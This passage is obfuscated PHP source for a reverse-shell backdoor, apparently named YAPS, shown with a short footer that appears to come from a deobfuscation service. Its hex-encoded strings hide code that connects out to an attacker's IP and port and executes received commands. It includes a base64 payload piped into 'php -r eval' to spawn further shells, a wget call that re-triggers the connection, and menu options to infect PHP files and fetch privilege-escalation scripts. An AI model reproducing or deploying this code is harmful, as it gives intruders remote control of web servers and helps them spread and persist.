"\x20\x43\x6f\x75\154\x64\x6e\x27\164\40\143\x68\141\x6e\x67\145\40\160\x65\x72\x6d\x69\x73\163\151\x6f\x6e\x73\56\x2e\x2e\x20\xa\x5b\151\135\x20\x46\151\154\x65\40\167\x61\x73\x20\163\x61\166\145\x64\x20\151\x6e\40" . yellow("\57\x74\x6d\160\57" . $download . "\xa")); } } return; } goto Wuvgt; iWGdZ: function backdoor() { } goto ZqmNp; VcfR6: function connect() { global $use_password, $commands, $ps1, $s, $silent; refresh_ps1(1); if (!isAvailable("\146\163\157\143\x6b\157\160\145\x6e")) { die(red("\133\x2d\x5d") . "\x20\106\165\x6e\x63\164\x69\x6f\x6e\40\x27\x66\x73\157\143\x6b\157\x70\145\156\x27\40\151\163\x6e\47\x74\40\141\x76\141\151\154\141\x62\x6c\x65\x2e"); } if ($use_password) { if (!check_password()) { die(fwrite($s, red("\x5b\x2d\135") . "\40\127\162\157\156\147\x20\x70\x61\163\163\x77\x6f\x72\x64\x2e\12")); } } if (!isset($_REQUEST["\163\151\x6c\x65\x6e\164"]) && !isset($_REQUEST["\163"]) && !$silent) { fwrite($s, banner() . "\12"); } refresh_ps1(); fwrite($s, "\12" . $ps1); while ($c = fread($s, 2048)) { $out = ''; if (substr($c, 0, 1) == "\41") { if (in_array(strtolower(substr($c, 1, -1)), $commands)) { $out = parse_stdin($c); } else { cmd_not_found(substr($c, 1, -1)); } } elseif (substr($c, 0, 3) == "\x63\x64\x20") { chdir(substr($c, 3, -1)); } elseif (substr($c, 0, -1) == "\x65\170\x69\x74") { fwrite($s, yellow("\x5b\151\x5d\x20") . "\103\x6c\157\163\x69\x6e\147\x20\x63\x6f\x6e\156\145\143\x74\151\157\156\x2e\xa"); fclose($s); die; } else { $out = run_cmd(substr($c, 0, -1)); } if ($out === false) { fwrite($s, red("\x5b\55\135\x20\124\x68\145\x72\145\x20\x61\162\x65\40\x6e\x6f\x20\145\170\145\143\40\146\x75\156\x63\x74\151\157\x6e\163")); break; } refresh_ps1(); fwrite($s, $out . $ps1); } fclose($s); } goto SqGTY; ixO3W: function banner() { global $banner; return $banner . white("\xa\40\40\40\x54\150\151\163\40\151\163\x20") . red("\x4e\x4f\x54") . white("\x20\x61\156\40\151\x6e\x74\x65\x72\x61\x63\x74\151\x76\x65\x20\x73\150\145\154\x6c\x2e\xa\x20\x20\40\40\x20\40\40\125\163\x65\40") . green("\41\150\145\154\x70") . white("\40\164\157\40\x73\145\x65\40\143\x6f\x6d\x6d\141\x6e\144\x73\x2e"); } goto uIseZ; LavC2: function help() { $help = "\12" . green("\125\163\x65\x66\x75\154\40\143\157\155\x6d\x61\x6e\x64\x73\72") . "\12\40\40" . cyan("\x21\x68\x65\154\x70") . "\12\40\40\x9\x44\151\x73\x70\x6c\141\x79\40\164\150\x69\x73\x20\x6d\x65\x6e\x75\12\x20\40" . cyan("\x21\x61\x6c\x6c\55\143\157\x6c\157\162\163") . "\xa\40\x20\x9\x54\x6f\147\x67\154\145\x20\x61\x6c\x6c\x20\x63\157\x6c\157\162\x73\x20\50\x6c\157\x63\x61\154\154\171\x20\157\x6e\x6c\171\51\xa\x20\40" . cyan("\41\x63\x6f\154\157\x72") . "\xa\40\x20\11\124\x6f\x67\x67\154\145\40\x24\120\123\x31\40\x63\157\x6c\157\x72\x20\x28\154\x6f\143\x61\x6c\x6c\171\x20\x6f\x6e\154\x79\51\12\40\x20" . cyan("\41\144\165\160\154\151\143\x61\x74\145") . "\xa\x20\40\x9\x53\160\141\x77\x6e\40\141\x6e\157\x74\150\x65\x72\x20\162\x65\166\x65\162\163\x65\x20\x73\x68\x65\x6c\x6c\xa\x20\40" . cyan("\41\145\156\x75\155") . "\xa\40\40\11\104\157\x77\x6e\x6c\x6f\x61\144\40\x4c\x69\x6e\x70\145\x61\163\40\x61\156\x64\40\114\151\156\145\x6e\x75\155\40\x74\157\40\x2f\x74\155\x70\40\141\x6e\144\x20\147\145\164\40\x69\164\40\x72\145\141\144\171\x20\164\x6f\40\x72\165\x6e\xa\40\x20" . cyan("\x21\x69\156\x66\x65\x63\164") . "\12\40\x20\x9\x49\x6e\x6a\145\x63\x74\40\x70\x61\x79\x6c\x6f\x61\x64\x73\x20\151\156\164\157\x20\x50\110\x50\x20\146\x69\154\145\163\xa\x20\40" . cyan("\x21\151\156\146\157") . "\xa\x20\x20\11\114\x69\x73\164\40\151\x6e\x66\x6f\162\x6d\141\x74\151\157\x6e\x20\x61\142\x6f\x75\164\40\164\141\162\x67\145\x74\12\40\x20" . cyan("\41\160\x61\163\163\167\x64") . "\xa\40\x20\11\x53\x68\x6f\167\40\x6f\160\164\x69\x6f\x6e\163\x20\146\157\x72\40\x70\x61\163\163\167\157\162\x64\11\12\40\40" . cyan("\x21\x70\150\x70") . "\xa\40\40\11\127\162\151\164\145\40\x61\156\144\40\x72\x75\156\40\120\110\120\40\x63\157\x64\145\40\x6f\156\x20\164\x68\x65\40\x72\145\155\157\x74\x65\x20\150\157\x73\x74\xa\40\40" . cyan("\x21\163\x74\x61\142\x69\x6c\151\x7a\145") . "\xa\x20\40\11\123\164\141\142\x69\x6c\x69\172\145\40\164\x6f\40\141\x6e\40\151\x6e\164\145\x72\141\143\x74\151\x76\145\40\163\150\x65\x6c\x6c\12\40\40" . cyan("\41\163\x75\x67\x67\x65\x73\164\x65\162") . "\12\40\40\11\104\x6f\x77\x6e\154\x6f\141\144\40\114\151\156\165\x78\x20\105\x78\160\154\157\x69\164\x20\123\165\147\x67\145\163\164\x65\162\40\164\x6f\x20\57\164\x6d\x70\40\x61\x6e\x64\x20\x67\x65\164\40\x69\x74\40\162\x65\141\x64\x79\40\164\157\x20\x72\x75\156\12\40\x20\12" . green("\x43\x6f\x6d\155\x61\156\x64\40\x6c\x69\156\x65\40\x6f\160\164\x69\157\156\163\72") . "\12\40\40" . white("\x24\x20\160\150\160\x20\x79\141\x70\x73\56\x70\150\160\x20\133\55\x2d\165\160\x64\141\x74\x65\x7c\x2d\165\x5d") . "\12\x20\40\x9\103\150\145\143\x6b\40\x69\x66\40\131\x41\120\123\x20\151\163\x20\x75\x70\x20\164\x6f\x20\x64\141\164\145\12\x20\40" . white("\44\40\x70\x68\x70\40\171\x61\x70\x73\56\160\x68\x70\x20\x69\x70\x20\x70\x6f\162\x74") . "\12\x20\x20\x9\x43\x6f\x6e\x6e\145\x63\164\x20\x74\157\x20\x69\160\72\160\157\162\x74\xa"; return $help; } goto efuXl; TWD7O: function isAvailable($function) { $dis = ini_get("\x64\x69\163\141\x62\154\x65\137\x66\165\156\143\x74\x69\157\156\x73"); if (!empty($dis)) { $dis = preg_replace("\x2f\133\x2c\40\135\53\57", "\54", $dis); $dis = explode("\54", $dis); $dis = array_map("\x74\x72\151\155", $dis); } else { $dis = array(); } if (is_callable($function) and !in_array($function, $dis)) { return true; } return false; } goto LavC2; uFC47: function red($str) { global $color; return $color ? "\x1b\x5b\x39\61\155" . $str . "\x1b\133\x30\x6d" : $str; } goto SQe5k; MIocV: function verify_update() { global $version, $resources; $newest_version = 0; echo cyan("\133\151\135\x20") . "\131\157\165\x72\x20\166\145\162\163\151\157\156\72\40{$version}\x2e\40\x43\x68\145\x63\153\x69\156\147\40\x66\x6f\162\x20\x75\x70\x64\x61\164\145\163\56\56\56\xa"; $request = get_request($resources["\166\x65\x72\151\x66\x79\125\160\x64\x61\164\x65\x55\122\114"]); if ($request) { $newest_version = $request; } $newest_version_ = (int) str_replace("\x2e", '', $newest_version); $version_ = (int) str_replace("\56", '', $version); if ($newest_version_ !== 0 && $newest_version_ > $version_) { echo red("\x5b\x69\135") . "\x20\131\x6f\x75\x72\40\166\145\x72\x73\x69\157\x6e\40\151\163\40\156\x6f\x74\x20\x75\x70\x20\164\157\x20\x64\141\164\x65\x2e\12" . green("\x5b\104\117\127\x4e\114\x4f\101\104\40\x76" . str_replace("\xa", '', $newest_version) . "\x5d\x3a\x20") . $resources["\165\160\x64\141\164\145\125\x52\114"] . "\xa"; return; } echo green("\133\x2b\x5d\x20") . "\x59\101\120\123\40\151\163\40\x61\154\x72\x65\x61\144\171\40\x75\160\40\164\x6f\40\144\141\x74\145\x20\x28\166{$version}\51\x21\xa"; return; } goto jsOgp; Wym75: function stabilize($post_socket = '') { global $s, $port, $ip; $payload = "\x4a\x48\x4e\152\143\x6d\154\x77\x64\x44\x31\172\141\107\x56\163\x62\106\x39\x6c\145\107\x56\152\x4b\x43\112\x33\x61\x47\154\x6a\141\103\102\172\131\63\112\160\143\x48\121\x69\x4b\x54\x73\153\x63\110\153\172\120\130\x4e\157\x5a\x57\x78\x73\x58\62\x56\x34\132\127\115\x6f\111\156\x64\x6f\x61\x57\x4e\157\x49\110\x42\x35\144\107\150\166\142\152\x4d\x69\x4b\x54\x73\x6b\x63\x48\153\71\x63\62\150\x6c\142\107\170\x66\x5a\130\x68\x6c\131\x79\x67\151\x64\x32\150\x70\x59\x32\147\x67\x63\x48\154\x30\x61\107\x39\x75\111\151\x6b\67\x61\127\x59\x6f\x63\x33\122\171\x62\107\126\x75\113\x43\x52\172\x59\63\x4a\x70\x63\x48\121\160\x50\x6a\131\147\112\151\131\147\x63\63\122\x79\143\x47\x39\x7a\113\x43\122\x7a\x59\63\112\160\143\110\121\163\x49\155\65\166\144\103\x42\155\x62\x33\x56\165\x5a\x43\x49\160\120\x54\61\155\131\x57\170\172\132\x53\153\147\112\x48\x4e\60\x59\x57\112\x70\142\x47\154\66\x5a\x58\x49\x39\111\151\x39\x69\141\127\64\x76\x59\x6d\x46\x7a\141\x43\101\x74\131\62\153\x67\x4a\x79\111\165\x4a\110\116\x6a\143\x6d\x6c\167\144\103\64\x69\111\103\x31\x78\x59\171\101\x76\x59\155\154\x75\x4c\x32\112\x68\x63\x32\147\x67\114\62\122\154\144\x69\x39\x75\144\127\x78\x73\x4a\x79\x49\67\132\127\x78\x7a\x5a\123\102\160\132\151\150\172\x64\x48\x4a\163\132\127\x34\157\112\x48\x42\x35\115\171\x6b\53\116\x79\101\x6d\x4a\151\x42\x7a\144\x48\x4a\167\x62\63\115\157\x4a\110\116\x6a\x63\x6d\x6c\167\x64\103\167\151\142\155\71\60\111\x47\132\166\144\127\65\x6b\111\151\x6b\x39\120\x57\132\x68\x62\110\116\154\113\x53\101\x6b\x63\63\x52\150\x59\155\154\163\141\130\160\154\x63\152\60\x6b\143\110\153\x7a\114\x69\x49\x67\x4c\127\115\x67\x4a\x32\x6c\x74\143\x47\71\x79\144\x43\x42\x77\x64\110\153\67\x63\110\122\x35\x4c\156\116\x77\x59\x58\144\165\113\106\167\151\x4c\x32\112\x70\142\151\71\151\x59\x58\x4e\157\130\x43\111\x70\x4a\x79\111\67\132\127\170\172\x5a\x53\102\160\x5a\151\150\172\x64\x48\112\163\132\x57\x34\157\x4a\x48\102\x35\x4b\124\x34\x32\111\x43\131\x6d\x49\x48\x4e\x30\x63\x6e\102\166\x63\x79\x67\x6b\x63\x32\116\171\141\130\102\60\x4c\x43\x4a\x75\x62\x33\x51\147\x5a\155\x39\x31\x62\155\x51\x69\x4b\x54\x30\x39\x5a\155\106\x73\x63\x32\125\160\111\103\122\x7a\144\107\106\151\141\x57\x78\x70\x65\x6d\126\171\x50\123\x52\167\x65\x53\64\151\111\x43\x31\152\x49\103\x64\x70\142\x58\102\x76\143\156\x51\147\143\x48\122\x35\117\63\102\x30\x65\123\65\x7a\143\x47\106\x33\x62\x69\150\143\x49\151\x39\151\141\127\64\166\x59\x6d\106\172\141\106\167\x69\x4b\123\x63\151\117\x32\x56\163\143\62\x55\x67\x4a\110\x4e\60\131\x57\x4a\160\x62\x47\154\66\x5a\130\111\x39\111\151\x39\151\x61\x57\64\x76\x59\x6d\106\x7a\141\x43\x49\67\112\110\x4e\x30\131\x57\x4a\x70\142\107\x6c\x36\132\130\x49\x39\x63\x33\122\171\x58\63\112\x6c\x63\x47\x78\x68\131\x32\125\157\x49\154\x78\x75\111\x69\167\x69\111\x69\167\153\x63\63\122\150\x59\x6d\x6c\x73\141\x58\160\154\x63\151\x6b\x37\112\x48\x4e\157\132\127\170\163\x50\x53\x4a\61\142\155\x46\164\132\123\x41\x74\x59\124\x73\x6b\143\63\122\150\x59\155\154\163\x61\130\160\x6c\x63\151\111\67\144\127\x31\x68\x63\x32\163\x6f\115\x43\153\67\112\x48\116\x76\x59\62\x73\71\x5a\x6e\116\166\x59\x32\x74\166\143\107\x56\x75\113\103\112\x4a\125\106\x39\x42\x52\105\122\123\111\x69\x78\121\x54\x31\x4a\x55\x4c\x43\122\154\x63\x6e\112\x75\x62\171\167\153\x5a\x58\112\171\x63\63\x52\x79\114\x44\x4d\x77\113\x54\163\x6b\x63\x33\122\x6b\x50\x57\x46\x79\x63\x6d\x46\65\113\103\101\x77\x49\x44\60\x2b\x49\x47\x46\x79\143\x6d\106\65\x4b\103\x4a\167\x61\x58\x42\154\111\x69\167\x69\x63\x69\x49\x70\114\104\105\147\120\x54\64\147\x59\130\x4a\171\131\130\x6b\157\111\x6e\102\x70\x63\x47\x55\x69\x4c\x43\x4a\x33\x49\151\153\x73\x4d\x69\101\x39\120\151\102\150\143\x6e\112\150\x65\123\147\x69\x63\107\x6c\167\132\123\111\163\x49\156\143\x69\113\x53\x41\x70\117\x79\x52\x77\x63\155\x39\x6a\x5a\130\116\x7a\120\x58\x42\171\x62\x32\x4e\146\142\x33\x42\x6c\142\x69\x67\153\143\x32\x68\x6c\142\107\167\x73\x4a\110\x4e\x30\132\103\167\153\x63\107\154\x77\132\130\x4d\x70\117\62\132\166\143\x6d\126\150\x59\x32\147\157\x4a\110\102\160\143\107\x56\x7a\x49\x47\x46\x7a\x49\x43\122\x77\113\123\x42\172\x64\x48\x4a\154\131\127\x31\146\143\x32\x56\60\x58\x32\x4a\163\x62\x32\116\162\141\x57\65\x6e\113\103\122\x77\x4c\x44\101\160\x4f\x33\116\60\143\x6d\126\150\142\x56\x39\172\x5a\130\122\x66\131\x6d\170\x76\x59\62\x74\160\142\x6d\x63\157\112\110\x4e\x76\x59\x32\163\x73\x4d\x43\153\x37\x64\62\x68\x70\x62\x47\125\157\x49\127\132\154\x62\x32\x59\x6f\x4a\x48\x4e\x76\x59\62\x73\x70\x4b\130\x73\153\143\x6d\126\x68\132\106\71\150\x50\x57\106\171\143\155\x46\65\113\103\x52\x7a\142\x32\116\x72\x4c\103\122\x77\x61\130\x42\154\143\x31\x73\170\x58\123\167\x6b\143\107\x6c\167\132\130\x4e\x62\115\154\60\160\117\62\x6c\155\113\107\154\165\130\x32\x46\171\x63\x6d\106\65\x4b\103\x52\172\x62\62\116\162\114\103\122\x79\x5a\127\106\153\x58\x32\x45\x70\x4b\x53\102\155\x64\x33\112\x70\x64\107\x55\x6f\112\x48\x42\x70\x63\107\x56\x7a\x57\172\x42\x64\x4c\x47\132\171\132\x57\106\153\113\103\x52\172\142\62\116\162\x4c\x44\111\167\x4e\104\x67\160\x4b\124\x74\160\132\151\150\x70\x62\154\71\150\x63\x6e\112\x68\145\123\x67\153\x63\x47\154\x77\x5a\x58\116\142\x4d\x56\60\x73\112\x48\x4a\154\131\127\x52\146\131\x53\153\160\x49\x47\132\63\143\155\154\60\x5a\123\x67\x6b\143\62\71\152\x61\x79\170\x6d\143\x6d\126\x68\132\x43\x67\x6b\143\x47\154\167\132\x58\x4e\x62\x4d\x56\60\163\115\152\x41\x30\117\103\153\x70\117\x32\x6c\155\x4b\x47\154\x75\130\62\106\x79\143\x6d\x46\65\113\103\122\x77\x61\x58\102\154\x63\61\163\x79\130\x53\x77\x6b\143\155\126\150\x5a\106\71\150\113\x53\x6b\147\132\156\144\x79\141\130\122\x6c\113\x43\122\x7a\142\62\x4e\162\x4c\107\x5a\x79\x5a\x57\106\153\113\103\122\167\141\x58\102\154\x63\x31\163\x79\x58\123\x77\x79\x4d\104\x51\64\x4b\x53\x6b\67\x66\x53\102\x6d\x59\62\x78\166\143\x32\125\x6f\x4a\110\116\166\131\x32\163\x70\117\x32\x5a\166\143\155\x56\150\x59\x32\147\x6f\x4a\110\x42\160\143\107\x56\x7a\x49\x47\106\x7a\x49\103\122\167\x4b\x53\x42\x6d\x59\62\170\166\x63\x32\125\157\112\x48\x41\160\x4f\x33\x42\171\142\62\116\146\131\x32\170\x76\143\62\x55\157\x4a\x48\102\x79\142\62\x4e\x6c\143\63\115\160\117\x77\x3d\75"; if (strlen($post_socket) > 1 && strlen($post_socket) > 0) { echo $post_socket; $skt = explode("\x3a", $post_socket); $post_ip = $skt[0]; $post_port = $skt[1]; $final_payload = base64_encode(str_replace("\111\x50\x5f\x41\x44\x44\122", $post_ip, str_replace("\120\117\x52\x54", $post_port, base64_decode($payload)))); shell_exec("\x65\x63\x68\x6f\40" . $final_payload . "\x7c\40\142\x61\163\x65\66\x34\40\55\144\x20\x7c\x20\x70\150\160\x20\55\x72\40\x27\x24\163\x74\144\x69\156\75\146\x69\154\x65\x28\42\x70\150\160\x3a\x2f\x2f\x73\164\144\151\x6e\42\x29\73\145\x76\x61\x6c\x28\x24\163\x74\144\x69\156\x5b\x30\135\x29\x3b\x27"); return; } fwrite($s, yellow("\x5b\151\x5d") . "\40\123\x65\x74\x20\165\160\40\x61\40\154\151\x73\164\145\156\145\162\x20\x6f\x6e\40\x61\x6e\157\x74\x68\x65\x72\x20\160\x6f\162\x74\40\x28\x6e\x63\x20\x2d\x6c\x6e\x76\x70\40\x3c\160\157\x72\x74\x3e\x29\x20\x61\x6e\x64\40\x70\x72\x65\x73\163\x20\105\116\124\105\122\x2e\12\x43\x68\x6f\157\163\x65\x20\x61\x20\160\x6f\x72\164\72\x20"); while ($c = fread($s, 8)) { if (strlen($c) > 0) { $recv_port = (int) $c; if ($recv_port > 65535 || $recv_port == 0) { fwrite($s, red("\x5b\55\x5d") . "\x20\120\157\x72\164\x20\155\165\163\164\40\142\145\x20\142\x65\164\x77\145\145\x6e\x20\x30\55\x36\65\x35\63\x35\x2e\xa\103\150\157\x6f\x73\x65\x20\x61\156\x6f\164\x68\145\162\x20\x70\157\x72\164\72\40"); } else { $final_payload = base64_encode(str_replace("\111\120\x5f\x41\x44\104\122", $ip, str_replace("\120\x4f\122\x54", $recv_port, base64_decode($payload)))); fwrite($s, yellow("\x5b\x69\x5d") . "\x20\x54\162\x79\151\x6e\147\x20\x74\x6f\x20\x63\x6f\156\156\145\143\x74\x20\164\x6f\x20{$ip}\x3a{$recv_port}\12"); if (isAvailable("\x70\157\160\x65\x6e") && isAvailable("\160\143\154\157\x73\145")) { pclose(popen("\145\x63\150\x6f\x20" . $final_payload . "\x7c\x20\142\x61\163\x65\x36\x34\x20\55\x64\x20\174\x20\x70\x68\160\x20\x2d\x72\40\47\x24\163\164\144\151\x6e\75\x66\x69\154\145\x28\42\160\150\160\72\x2f\57\163\x74\x64\x69\x6e\x22\51\73\x65\x76\x61\154\50\x24\x73\164\144\x69\156\133\x30\135\x29\73\x27\40\46", "\x72")); return; } $curl_url = $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\123\103\110\x45\115\x45"] . "\72\57\57" . $_SERVER["\x48\124\124\x50\x5f\x48\x4f\123\124"] . $_SERVER["\122\x45\121\125\105\x53\x54\137\x55\122\111"]; run_cmd("\164\x69\155\145\157\165\x74\x20\x2d\x2d\x6b\151\x6c\154\55\x61\146\164\x65\162\x20\x30\40\61\x20\167\x67\145\164\40\x2d\x2d\160\x6f\163\164\55\x64\x61\164\x61\75\42\170\75{$ip}\x3a{$recv_port}\x26\163\164\141\142\151\x6c\x69\x7a\x65\75\61\42\x20{$curl_url}\40\76\40\x2f\x64\145\x76\x2f\x6e\x75\154\154"); return; } } } } goto iWGdZ; p4M3a: $ps1_color = true; goto gCfG6; iyx8E: $options = getopt($short_args, $long_args); goto k28_t; j6Lb0: function cyan($str) { global $color; return $color ? "\x1b\x5b\x39\66\155" . $str . "\33\x5b\60\155" : $str; } goto x3nOo; SQe5k: function yellow($str) { global $color; return $color ? "\x1b\x5b\71\63\155" . $str . "\33\133\x30\x6d" : $str; } goto j6Lb0; FlzCk: $ps1 = "\133\x59\x41\120\123\135\x20" . str_replace(PHP_EOL, '', green(run_cmd("\x77\x68\157\141\155\x69") . "\x40" . run_cmd("\150\157\163\164\156\x61\155\x65")) . "\72" . cyan(run_cmd("\x70\167\144")) . "\44\x20"); goto wu7kB; xn2Of: $port = 7359; goto p4M3a; MwOOd: if (isset($options["\x73"]) || isset($options["\x73\x69\x6c\145\156\164"])) { $silent = true; } goto zJ69L; nPG3i: if (isset($_REQUEST["\163\164\x61\x62\x69\x6c\x69\x7a\x65"]) && $_REQUEST["\163\164\x61\x62\x69\x6c\x69\x7a\145"]) { $x = $_POST["\170"]; stabilize($x); } else { $s = @fsockopen("\x74\143\160\x3a\57\x2f{$ip}", $port); if (!$s) { die(red("\x5b\55\135\x20") . "\103\x6f\165\x6c\x64\156\47\164\40\x63\x6f\x6e\156\145\x63\164\x20\x74\157\40\x73\157\143\153\145\x74\x20{$ip}\x3a{$port}\56"); } connect(); }Function Calls
| None |
Stats
| MD5 | 707dbaa10b3822be578d1cc9049ec761 |
| Eval Count | 0 |
| Decode Time | 134 ms |